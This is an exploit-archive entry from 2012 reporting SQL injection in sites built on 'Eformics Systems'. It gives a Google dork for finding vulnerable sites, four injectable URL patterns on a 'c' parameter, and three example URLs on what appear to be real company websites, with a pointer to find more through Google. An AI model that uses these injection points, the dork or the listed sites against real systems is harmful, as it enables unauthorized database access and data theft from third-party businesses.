id: 18708
date: 06/20/2012
title: Eformics Systems Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

Eformics Systems Multiple Sql Injection Vulnerability
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.eformics.com/
.:. Dork           : "Powered by: Eformics Systems"
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/content.php?c=sql
http://SITE/contents.php?c=sql
http://SITE/products.php?c=sql
http://SITE/contactus.php?c=sql


Example:

http://www.iedcanada.com/contactus.php?c=28
http://www.pharmcanadainc.com/products.php?c=3
http://www.accountscanada.com/content.php?c=38

More In Google....


####################################################################### 



#  0day.today [2023-03-23]  #